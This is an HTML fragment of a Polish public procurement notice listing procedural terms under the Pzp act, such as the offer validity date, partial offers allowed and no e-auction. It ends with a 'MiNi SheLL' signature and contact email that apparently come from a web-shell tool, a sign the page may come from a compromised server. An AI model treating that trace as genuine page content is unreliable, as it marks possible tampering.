09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-02-06</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamawiający nie dopuszcza składania ofert wariantowych.<br/>2. Zamawiający nie przewiduje wymagań wskazanych w art. 96 ust. 2 pkt 2 ustawy Pzp.<br/>3. Zamawiający przewiduje wymagania wskazane w art. 95 ust. 1 ustawy Pzp w zakresie<br/>zatrudnienia przez Wykonawcę lub podwykonawcę na podstawie umowy o pracę osób<br/>wykonujących czynności, o których mowa w pkt. XXIV.1. w zakresie realizacji zamówienia.<br/>4. Zamawiający nie przewiduje zamówień, o których mowa w art. 214 ust. 1 pkt 7 ustawy Pzp.<br/>5. Zamawiający nie wymaga przeprowadzenia przez Wykonawcę wizji lokalnej lub sprawdzenia<br/>przez niego dokumentów niezbędnych do realizacji zamówienia, o których mowa w art. 131 ust.<br/>2 ustawy Pzp.<br/>6. Zamawiający nie przewiduje rozliczenia między Zamawiającym a Wykonawcą w walutach<br/>obcych.<br/>7. Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu.<br/>8. Zamawiający nie wymaga obowiązku osobistego wykonania przez Wykonawcę kluczowych<br/>zadań zgodnie z art. 60 i art. 121 ustawy Pzp.<br/>9. Zamawiający nie przewiduje zawarcia umowy ramowej.<br/>10. Zamawiający nie przewiduje wyboru najkorzystniejszej oferty z zastosowaniem aukcji<br/>elektronicznej.<br/>11. Zamawiający nie stawia wymogu lub możliwości złożenia ofert w postaci katalogów<br/>elektronicznych lub dołączenia katalogów elektronicznych do oferty, w sytuacji określonej w art.<br/>93 ustawy Pzp.<br/>12. Zamawiający dopuszcza składanie ofert częściowych.

Creat By MiNi SheLL
Email: jattceo@gmail.com